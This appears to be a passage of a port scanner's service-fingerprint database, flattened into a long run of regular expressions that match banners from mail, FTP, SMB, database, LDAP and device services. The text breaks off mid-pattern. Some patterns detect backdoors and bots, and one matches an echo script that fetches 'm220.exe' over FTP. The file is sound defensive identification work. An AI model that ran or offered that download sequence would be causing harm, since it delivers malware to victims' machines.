EHLO MAIL RCPT DATA(?: ETRN)?(?: AUTH)?\r\n214 NOOP QUIT RSET HELP \r\n +220 ([-.\w]+) SMTP version 1\.00;\r\n214 We strongly advise you to study (?:of )?the RFC ?821\.\.\.\r\n +220 ([-\w_.]+) ESMTP\r\n402 Error: command not implemented\r\n +220 smtpd\r\n502 [\d.]+ Error: command not recognized\r\n +220 E?SMTP [^\r\n]*\r\n502 5\.5\.2 Error: command not recognized\r\n +220 ([-\w_.]+) ESMTP \w+\r\n +220 (\S+) E?SMTP Sendmail; +220.*214 SMTP server comments and bug reports to: \ +220.*500 MessageWall: Unrecognized command +220 .*\r\n214-Commands Supported:\r\n214-HELO EHLO AUTH HELP QUIT MAIL NOOP RSET RCPT DATA ETRN VRFY STARTTLS\r\n214-Copyright \(c\) 1995-200\d, Stalker Software, Inc\.\r\n +220 .* ESMTP\r\n214-Gentoo Linux qmail-([-\w.]+)\r\n214 qmail home page: http://pobox\.com/~djb/qmail\.html\r\n +220 ([-\w_.]+) ESMTP\r\n214-The following commands are recognized\r\n214-\tauth\tdata\tehlo\t +220 \[?([-\w_.]+)\]? ESMTP server ready\.\r\n214-Recognized SMTP commands are:\r\n214- HELO EHLO MAIL RCPT DATA RSET\r\n214- AUTH NOOP QUIT HELP VRFY SOML\r\n214 Mail server account is '([-\w_.]+)'\.\r\n| p|Mercury/32 smtpd +220 ([-\w_.]+) Server ESMTP ready at .*\r\n241-\r\n +220 ([-\w_.]+) ESMTP \r\n +220 ([-\w_.]+)\r\n214-Commands supported:\r\n214 AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP\r\n +220 ([-\w_.]+) MailShield SMTP\r\n +220-([-\w_.]+) ESMTP\r\n220-MagicMail Daemon with Built-In Anti-Spam\r\n220 See http://www\.linuxmagic\.com for info\r\n214 qmail home page: http://cr\.yp\.to/qmail\.html, LinuxMagic Support http://www\.linuxmagic\.com\r\n +220 ESMTP Service ready at .*\r\n214-Enter one of the following commands:\r\n214-HELO EHLO MAIL RCPT DATA RSET NOOP QUIT\r\n214 HELP \r\n +220 ([-\w_.]+) ESMTP MTA\r\n214-This is Sendmail version AIX([\d.]+)/([\w.]+)\r\n +220 Service ESMTP Ready\r\n214-This is Sendmail version ([\d.]+) \((P[-\w_.]+)\)\r\n.*future enhancements, contact your HP representative +220 ([-\w_.]+)\r\n502 Command not implemented\r\n +220 ([-\w_.]+) ESMTP[^\r\n]*\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n\r\n +220 ([-\w_.]+) - Ready at .*\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA RSET NOOP QUIT\r\n214- For more info use 'HELP '\.\r\n214 End of HELP info\r\n +220 ESMTP Service ready\r\n500 Command unrecognized\r\n +220 ([-\w_.]+) ESMTP [-\w_.]+ Mail Server ([\d.]+); .*\r\n214-2\.0\.0 This is [-\w_.]+ Mail Server [-\w_.]+\r\n214-2\.0\.0 Topics:\r\n +220 WebMail ESMTP\r\n502 negative vibes\r\n +220 Welcome to the mail server\.\r\n211 DATA EXPN HELO MAIL NOOP QUIT RCPT RSET SAML SEND SOML TURN VRFY\r\n +220 .*\r\n214-This is ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-\w_.]+ \(([-\w_.]+)\)\r\n +220 ([-\w_.]+) Service ready\.\r\n214- Valid commands are:\r\n214- HELO MAIL RCPT DATA RSET QUIT NOOP\r\n214- HELP VRFY\r\n214- Commands not valid are:\r\n214- SEND SOML SAML TURN\r\n214- Mail forwarding handled by this server\.\r\n| p|i5/OS V5R4M0 or OS/400 smtpd +220 ([-\w_.]+) ESMTP server is ready\r\n.*214-Copyright \(c\) 1995-2004, Stalker Software, Inc\.\r\n +220 ([-\w_.]+) ESMTP\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n +220 ([-\w_.]+) ESMTP Generic Ready\r\n502 Command not implemented\.\r\n +220 ([\w_.-]+) ESMTP\r\n214-Run 'info anubis' or visit http://www\.gnu\.org/software/anubis/manual/\r\n214 End of HELP info\r\n +220 SMTP service ready\r\n214-Commands:\r\n214-\tDATA\tRCPT\tMAIL\tQUIT\tRSET\r\n214 \tHELO\tVRFY\tEXPN\tHELP\tNOOP\r\n +220 ready\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA\r\n214- RSET NOOP QUIT HELP\r\n214- VRFY EXPN\r\n214-For more info use HELP \r\n214 End of HELP info\r\n +220 ([-\w_.]+) SMTP; .*\r\n500 Syntax error, command unrecognized\.\r\n +220 ([-\w_.]+) SMTP; .* \+\d{4}\r\n500 Syntax error, command unrecognized\r\n +220 ([-\w_.]+) ESMTP smtprelay service ready\.\r\n214-This is smtprelay\r\n214-Topics: +220 SMTP ESMTP ready at .*0\r\n214-\r\n214 End of HELP info\r\n +220 ([-\w_.]+)\r\n214-HELO domain\r\n214-EHLO domain\r\n214-QUIT\r\n214-MAIL FROM: \[options\]\r\n +220 ([-\w_.]+) ESMTP Ready\r\n211 Help:->Supported Commands: HELO,EHLO,QUIT,HELP,RCPT,MAIL,DATA,RSET,NOOP\r\n +220 ([-\w_.]+) SMTP Relay Service ready\r\n500 Syntax error, command unrecognized\r\n +503 Synchronization error\r\n +(sgi_[-.\w]+\r\n(?:[-.\w]+\r\n)*) +Welcome to Vulnerable Server! Enter HELP for help\.\nValid Commands:\nHELP\nSTATS \[stat_value\]\nRTIME \[rtime_value\]\nLTIME \[ltime_value\]\nSRUN \[srun_value\]\nTRUN \[trun_value\]\nGMON \[gmon_value\]\nGDOG \[gdog_value\]\nKSTET \[kstet_value\]\nGTER \[gter_value\]\nHTER \[hter_value\]\nLTER \[lter_value\]\nKSTAN \[lstan_value\]\nEXIT\n +Commands: HELP VER GET LIST SET INSTCMD LOGIN LOGOUT USERNAME PASSWORD STARTTLS\n +Commands: VER REQ HELP LISTVARS LOGOUT LOGIN PASSWORD LISTRW VARTYPE VARDESC ENUM SET INSTCMD LISTINSTCMD INSTCMDDESC FSD MASTER USERNAME STARTTLS\n +\x05\xff +\x01\x03\0\0........\0\0\0\0........\x9f\xfb.([^\0\x01]+)[\0\x01].*VMware(\d+),(\d+)\x05\x06AFP3\.4\x06AFP3\.3\x06AFP3\.2\x06AFP3\.1\x06AFPX03\x06\tDHCAST128\x04DHX2\x06Recon1\rClient Krb v2\x03GSS\x0fNo User Authent.*\x1b\not_defined_in_RFC4178@please_ignore +AB\0N\x04\x01\x94\0\x06/cccb/\0\0\x02\0\x0cContent-Type\0\0\x17text/html;charset=utf-8\0\0\x0eContent-Length\0\0\x03970\0AB\x03 +\x02\0\0\x01\x03\0U\xd0DSQ\x02\0\0\x01\x03\0U\xd0DSQ +\0\r\nlogin: \^W\^@\^@\^@\^ +\x15\x01\0\0\x08\0\0\0\0\x80\t\x03\x08 +\x16\x03\0\0\*\x02\0\0&\x03.*\x0edropbox-client0 +\x16\x03\0\0\*\x02\0\0&\x03\0.*T[oO][rR]1.*[\x00-\x20]([-\w_.]+) +\x16\x03\0.*Router\([a-zA-Z0-9_-]+).*Sophos EM Certification Manager +\x16\x03\0.*Sophos EM Certification Manager +\0\0MF\xff\xf3MBr\0\0\0\0\x08\x01@\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1\.0\0\x02MICROSOFT NETWORKS 1\.03\0\x02MICROSOFT NETWORKS 3\.0\0\x02LANMAN1\.0\0\x02LM1\.2X002\0\x02Samba\0\x02NT LANMAN 1\.0\0\x02NT LM 0 +\0\0\0\0\0\0\0=r\0\0\0\0\0\0\0\xd8\x97%\x01\x13\0\0\0CONDUCTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19240920 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0h\xd52\t\x10\0\0\0FUNDUS_PG([\w._-]+)\x1b\0\0\0unbekannter Code: 154326376 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0XL\)\x01\x11\0\0\0PARATUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19483736 +\0\0\0\0\0\0\0>r\0\0\0\0\0\0\0\xf8\x926\x01\x14\0\0\0CONSPECTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 20353784 +\xce\xfa\x01\0\x16\0\0\0\0\0\0\x003\xf6\0\0\0\0\0\0\0\0 +\x52\x00\x00\x00\x08\x00\x00\x00\x03 +\0\0\0\x02\0\x03 +\0\0\x01\x01@\n\0\x08\x80\0\x82\0L\xb8..\xff\xff\xff\xff\0\0\0\0 +\0\0\0\x61\xffSMBr\0\0\0\0\x88\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0\x02\x0a\0\x01\0....\xff\xff\x00\x00....\0\x03\0\0\0 +\0\0\0.\xffSMBr\0\0\0\0\x88..\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0..\0\x01\0..\0\0...\0..\0\0 +\x83\0\0\x01\x8f +\0\0\0.\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0.*\W([-_.\w]+)\0 +\0\0\0.\xffSMBr\0\0\0\0\x88\x01.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0 +\0\0\0M\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0\x02\x01\0\x01\0\xff\xff\0\0\xff\xff\0\0\0\0\0\0\x01\x02\0\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0WORKGROUP\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\0\0\0.15\0 \x07\x01\[12:1\]\0 \x07\x02\[2003\]\0 \x07\x051\d+\0 INET\0 ([\w._-]+)\0|s p|HP OpenView Omniback/Data Protector +E\0\0\0.S\w+\0C0A000\0Mel protocolo 65363\.19778 no est..? soportado: servidor soporta 1\.0 hasta 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0.S\w+\0C0A000\0Mnicht unterst\xc3\xbctztes Frontend-Protokoll 65363\.19778: Server unterst\xc3\xbctzt 1\.0 bis 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1293\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1408\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1445\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1454\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1440\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1497\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1570\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x94SFATAL\0C0A000\0MProtocole non support\?e de l'interface 65363\.19778 : le serveur supporte de 1\.0 \?\n3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1666\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1694\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1695\0RProcessStartupPacket\0\0 +\0\0\0\sequence_number=\[0\] result=\[-2005\] \0 +\0\0\0\x0e\*\*DPTMMSG\*\*\0\0\xf8 +\0\0\0.\xffSMBr\0\0\0\0\x80|s p|Nortel/D-Link router instant setup +\xcd\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x02\0\0\0\0\0 +\0\0\0\x152999 Invalid command\n\xff\xff\xff\xfc +\0\0\0\x0b3999 No go\n +2[23]0 FTP Server Ready\r\n504 Comand length not supported\.\r\n +\0\0\x02\0\0\0\0\0\0\0\0\0\r\0\0\0\0.......International Business Machines Corp\. +\0\x01\0\x03\0\0\0/Incompatible version number: message discarded\. +\x01\0\x0b\0\0.....\0\0\0\0.*Sun Microsystems, Inc\. +\x01\0\x0b\0\0.*Conectiva Linux \(XFree86 ([\d.]+), patch level (\w+)\) +\0J\x0b\0\0...This copy of X-Win32 will only accept connections from network ([\d.]+)\0\0 +\x01\0\x0b\0\0.....\0\0\0\0.*HDS Network Systems, Inc\. \(([^)]+)\) +\0\0\x02\0\0\0\x01\0\x04\0\0\0\0\r([\w._-]+):\d+\0\x07\0\0\0\0 \x10\0,\x1a\0\0X\.Org Foundation\x01\n\x01\0\x05\0\0\0\xe6\xbf\xc0\xb5\0\0\0\0\0\0\0\0 +GIOP\x01\0\x01\x06\0\0\0\0 +\x80\xf0\x80\x12\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01 +RTSP/1\.0 400 Bad Request\r\nServer: AirTunes/([\w._-]+)\r\n\r\n +\0 +default: unknown printer\n +VSE Line Printer Daemon has rejected this request\.\0\0 +no queue to check\n\0 +EXM {EXC \0\x1fcom\.rbnb\.api\.SerializeExceptionMSG \0JUnrecognizable parameter read from input stream\.\nElement read was \x01default}\r\nPNG {}\r\n| p/Ring Buffered Network Bus/ i|http://outlet.creare.com/rbnb/ +\x02rFactorMonitor\x000400\0 +\0\0\0\t51000000\0\0\0\0[^\0] +0%\x02\x01\x01a \n\x010\x04\0\x04\x19anonymous bind disallowed +02\x02\x01\x01a-\n\x01\x02\x04\0\x04&requested protocol version not allowed +0E\x02\x01\x01a@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x84\0\0\0I\x02\x01\x01a\x84\0\0\0@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eanonymous bind +0\x84\0\0\0\x10\x02\x01\x01a\x84\0\0\0\x07\n\x01\0\x04\0\x04\0 +0\.\x02\x01\x01a\)\n\x010\x04\0\x04\"Failed, anonymous bind not allowed +0&\x02\x01\x01a!\n\x01\x02\x04\0\x04\x1aOnly LDAP v3 is supported\. +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eBind succeeded + +TNMP\x16\0\0\0TNME\x80\0\xfe\xff..([\w.]+):(\d) +\0\x04\0 +TNMP.\0\0\0TNME.\0\0\0USER.\x07\x04\0\x08\0.{9}\0P\0\x03\0U\0\xff\xff\0.*Desktop Manager ([\d.]+)\0 +ActiveFax Server: Es befinden sich insgesamt +\x03\0\x26 +no entries\n +Host Name: ([-\w_.]+)\nPrinter Device: hp LaserJet (\w+)\nPrinter Status: ([^\r\n]+)\n\0\0 +\x03\0\0\x0b\x06\xd0\0\0\x12.\0 +\x03\0\0\x0b\x06\xd0\0\0\x03.\0 +\x03\0\0\x0e\t\xd0\0\0\0[\x02\xa1]\0\xc0\x01\n +\x03\0\0\x0b\x06\xd0\0\x004\x12\0 +.\0\x01.....\0([^\0]+)\0 +\0\0 +\x74\x4e\x63\x50\0\0\0\x10\x33\x33 +\0\0\0\x01\0\x17\0\x14\0\x06\0\0\0.\0\0\0\0\0\0 +.\0\0\0.\0\0\0\x03\0\0@\x02\x0f\0.*\x03\0\0\0\0\x02\0/\0.\0\0\0\0\0\0\0.*CN=([-.\w ]+)/OU=([-.\w ]+)/OU=([-.\w ]+)/O=([-.\w ]+)|s p/Lotus Domino server/ i|CN=1;OU=2/3;Org=4 +\x02\0\0\0\0\0\0/\0\0\0\0\0\0\0\0\0@\x1f\0\0\0\0\0\0\0\0\0/\0\0\0\x02\0\0@\x02\x0f\0\x01\0=\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\)\0\0\0 +\x18\0\x01\x02Invalid packet length\0 +{\"error\":{\"code\":-32700,\"message\":\"Parse error\.\"},\"id\":null,\"jsonrpc\":\"([\w._-]+)\"} +\x02\x06 +\x01\x01\0\xfd\xce\xfa\x0b\xb0\xa0\0\0\0\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x12 +HTTP/1\.0 400 Bad Request\r\nDate: .*\r\nServer: Boa/([\w._-]+)\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n400 Bad Request\n

400 Bad Request

\nYour client has issued a malformed or illegal request\.\n\n +\0.\0\0\x02\0\0\0.*\(IAGENT = \(AGENT_VERSION = ([\d.]+)\)\(RPC_VERSION = ([\d.]+)\)\) +\0\x20\0\0\x02\0\0\0\x016\0\0\x08\0\x7f\xff\x01\0\0\0\0\x20 +\0.\0\0[\x02\x04]\0\0\0 +\0,\0\0\x04\0\0\0\"\0\0 \(CONNECT_DATA=\(COMMAND=version\)\) +S\xf5\xc6\x1a{ +\0\0\0H\0\0\0\x02.[^\0]*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* ACAP \(IMPLEMENTATION \"CommuniGate Pro ACAP (\d[-.\w]+)\"\) +.\0\x01\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0.*\0\0\0 +\+Welcome to Ability FTP Server \(Admin\)\. \[20500\]\r\n +200 NOD32SS ([\d.]+) \((\d+)\)\r\n + +\x01\xff\0\xff\x01\x1d\0\xfd\0\n\x03\x05A\+ API \(([\d.]+)\) - CCS \(([\d.]+)\)\0 +\x80\x01\0\x80\0\x80\0\0\xe5az\xcb\0\0\0\0J...............\x02\0\x01\0\0<\x01,.......\0...\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\x01\x04\0.\0\x80\x08 +\0`\0\x04\0\0\0\x1810\x000\x000\x00852224\0\0\0\0\0\0\0\0\0\0\0 +MCOP\0\0\0.\0\0\0\x01\0\0\0\x10aRts/MCOP-([\d.]+)\0\0\0\0 +Asterisk Call Manager/([\d.]+)\r\n +Response: Follows\r\nPrivilege: Command\r\n--END COMMAND--\r\n +220 jeem\.mail\.pv ESMTP\r\n +\r\nUser Access Verification\r\n\r\nYour PassWord: +echo o [\d.]+ \d+ >s\r\necho common>> s\r\necho common>> s\r\necho bin>> s\r\necho get m220\.exe +220 Bot Server \(Win32\)\r\n +PWD +=+\n= +RBackdoor ([\d.]+) +220 Windrone Server \(Win32\)\r\n +220 Reptile welcomes you\.\.\r\n +MZ\x90\0\x03\0\0\0\x04\0\0\0\xff\xff\0\0\xb8\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0fn\0\0\xd0\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\. +220 SSL Connection Established - Loading Protocol\.\.\.\.\r\n +A-311 Death welcome\x001 +\x01\0\0\0 +HTTP/1\.0 401 Authorization Required\r\n.*Server: bitcoin-json-rpc\r\n +0x[0-9a-fA-F]{32}L +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=1 +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=0 +\\0\0\0\\0\0\x000RAR\0 \0\0.\xe2\x02\0\xc4G\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x19\0\0\0\0\0\x0f\xbeB!\x012\x02\xd1\x02\x032\x02p\0\x062\x02\x80\0 +BZFS\d\d\d\d\r\n\r\n +ACK\x01 +\x8d\0\0\0\x8d\0\0\0\x100\x81\x89\x02\x81\x81\0.*\x02\x03\x01\0\x01\0 +\x02\x07\x04\0\xe0\0\0\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x04\x03\x02\x010\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\xe0\0\0\0\0\0\0\0\0\x80\0\0\0\x80\0\0\0hfnapp04\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x02\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\*\x01..\0\x04\0\0\0\x01 +Cirrato Client ([\w._-]+)\0 +200.*Citadel(?:/UX)? +\x7f\x7fICA\0\x7f\x7fICA\0 +.\0\0\0\x81\0\0\0\x01 +\0\0\0\x10ClsBoolVersion 1 +CFMSERV\(1\)\n +Concerto Software\r\n\r\nEnsemblePro SendLog Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +Concerto Software\r\n\r\nContactPro TimeSync Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +\x10\x06[\x80-\xff].......\x0b\x01([\w._-]+)\0 +Crestron Terminal Protocol Console opened\r\n +\r\nCrestron Terminal Protocol Console Opened\r\n\r\n +\x0f\0\x01\x02 +/usr/sbin/cvs-pserver: line \d+: .*cvs: No such file or directory\n +\d\d:\d\d:\d\d [AP]M \d\d\d\d/\d\d/\d\d\n +\d\d\d\d/\d\d/\d\d \d\d:\d\d:\d\d\r\n +\xaf\x01 +220 ([-.\w]+) dictd ([-.\w/]+) on ([-.+ \w]+) +0000019a[0-9a-f]{402}\r\n +220 DSPAM DLMTP ([\w._-]+) Authentication Required\r\n +\0\0\0\x0c\0\0\0\?\0\0\0\x02 +0 PROTOCOL 2 [23] AGENT,CONSOLE,INSTALL +\?p\xf7/Zq\xa2\xf5\x03.......\xf4\xea.......B +\(m\xe9l@k\xb7\xf5\x03 +\(m\xe9l@k\xb3\xf7\x1e\xa5 +\(m\xe9l@k\xb1\xf1\x15\xa5 +\?\x008 \xc3p EFTSRV1 ([\d.]+) +\x00\x00\x03\x72<\?xml version=\"1\.0\" encoding=\"UTF-8\" standalone=\"no\" \?>\n\n\n \n ([^<]+)\n .*\n \n ([\w._-]+)\n +7\0\0\0~\0\0\0\0\x14\x06\x04\xe8\x99\x02\0\x05\xeb\0\x04\xdf\x92\0\0\n\xd7\xa3p=\n\xd7\x18@\x04\x95\xf1\x01\0\x13\x13EVE-EVE-RELEASE@ccp +Windows NT Version ([\d.]+) build (\d+), \d+ processors? \(.*\)\r\nFingerDW V([\d.]+) - Hummingbird Ltd\.\n +\r\nIntegrated port\r\nPrinter Type: Lexmark T642\r\nPrint Job Status: +Welcome to FreeVCS MSSQL NT Service\r\n +Welcome to FreeVCS DBISAM NT Service\r\n +FB/([\d.]+) PUSH: SERVER_READY ([\w._-]+) (\w+)\n +220 ([-/.+\w]+) FTP server \(SecureTransport (\d[-.\w]+)\) ready\.\r\n +220 3Com 3CDaemon FTP Server Version (\d[-.\w]+)\r\n +220-GuildFTPd FTP Server \(c\) \d\d\d\d(?:-\d\d\d\d)?\r\n220-Version (\d[-.\w]+)\r\n +530 Connection refused, unknown IP address\.\r\n +220 IIS ([\w._-]+) FTP\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\.\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\r\n +220 WFTPD (\d[-.\w]+) service \(by Texas Imperial Software\) ready for new user\r\n +220 ([-.+\w]+) FTP server \(Version [\d.]+\+Heimdal (\d[-+.\w ]+)\) ready\.\r\n +500 OOPS: (could not bind listening IPv4 socket)\r\n +500 OOPS: vsftpd: (.*)\r\n +220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220 ([-\w_.]+) running FileZilla Server version (\d[-.\w ]+)\r\n +220.*\r\n220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220-.*\r\n220-\r\n220 using FileZilla FileZilla Server version ([^\r\n]+)\r\n +220-FileZilla Server\r\n +431 Could not initialize SSL connection\r\n +220 AXIS ([\w._-]+) Network Camera ([\w._-]+ \(\w+ \d+ \d+\)) ready\.\r\n +220 AXIS StorPoint CD E100 CD-ROM Server V([\d.]+) .* ready\.\r\n +220 AXIS (.+) FTP Network Print Server V([-\w_.]+) +220 AXIS (\w+) Network Fixed Dome Camera (.*) ready\.\r\n +220-Cerberus FTP Server Personal Edition\r\n220-UNREGISTERED\r\n +220-Cerberus FTP Server - Personal Edition\r\n220-UNREGISTERED\r\n220-Welcome to Cerberus FTP Server\r\n220 Created by Grant Averett\r\n +220[ -].*FTP server \(lukemftpd (\d[-. \w]+)\) ready\.\r\n +220[ -]Serv-U FTP[ -]Server v([\w._-]+) +220-Serv-U FTP Server for Winsock\r\n +220-FTP Server v([\d.]+) for WinSock ready\. +431 Unable to negotiate secure command connection\.\r\n +220-FTP Server ready\r\n220-Use USER user@host for native FTP proxy\r\n220 Your FTP Session will expire after 300 seconds of inactivity\.\r\n +220 JD FTP Server Ready +220 ([-.\w]+) FTP server \(Version ([-.+\w()]+)\) ready\.\r\n +220 Server \(ProFTPD\) \[([-.\w]+)\]\r\n +220 ProFTPD (\d\S+) Server +220 FTP Server \[([-\w_.]+)\]\r\n +220.*ProFTP[dD].*Server ready +220 ProFTP Server Ready\r\n +220 Welcome @ my\.ftp\.org\r\n +220 .* FTP Server \(ProFTPD ([\d.]+) on Red Hat linux ([\d.]+)\) ready\.\r\n +220 ProFTP-Server auf ([-\w_.]+)\r\n +220.*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD\) +220 FTP Server ready\.\r\n +220.*NcFTPd Server +220 ([-\w_.]+) FTP server \(SunOS 5\.([789])\) ready +220 VxWorks FTP server \(VxWorks ?([\d.]+) - Secure NetLinx version \(([\d.]+)\)\) ready\.\r\n| p|AMX NetLinx A/V control system ftpd +220[- ]FTP server ready\.\r\n.*214 Pure-FTPd - http://pureftpd\.org/?\r\n +220---------- Welcome to Pure-FTPd \[privsep\] \[TLS\] ----------\r\n220-You are user number| p/Pure-FTPd/ i|with SSL/TLS +220 ready, dude \(vsFTPd (\d[0-9.]+): beat me, break me\)\r\n +220 TYPSoft FTP Server (\d\S+) ready\.\.\.\r\n +220- Welcome to this Xitami FTP server, running version ([\d\w.]+) of Xitami\. \n You are user number (\d+) of a permitted (\d+) users\.| p/Xitami ftpd/ v/1/ i|2/3 users +220 Service Ready for new User\r\n +220 ([-\w]+) FTP server \(NetWare (v[\d.]+)\) ready\.\r\n +220 ([-.+\w]+) FTP SERVICE ready\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n +220 FTP server \(Hummingbird Ltd\. \(HCLFTPD\) Version ([\d.]+)\) ready\.\r\n +220-\r\n Your connection logged!\r\n220 ([\w_.-]+) FTP server \(NetBSD-ftpd 200\d+\) ready\.\r\n +220 CommuniGate Pro FTP Server ([\d.]+) ready\r\n +(?:220.*\r\n)?220 [Ee]valine FTP server \(Version: Mac OS X +220 WinGate Engine FTP Gateway ready\r\n +220 Welcome to Quick 'n Easy FTP Server\r\n +421 Too many connections for this IP address, please try again later\.\r\n +220 Canon 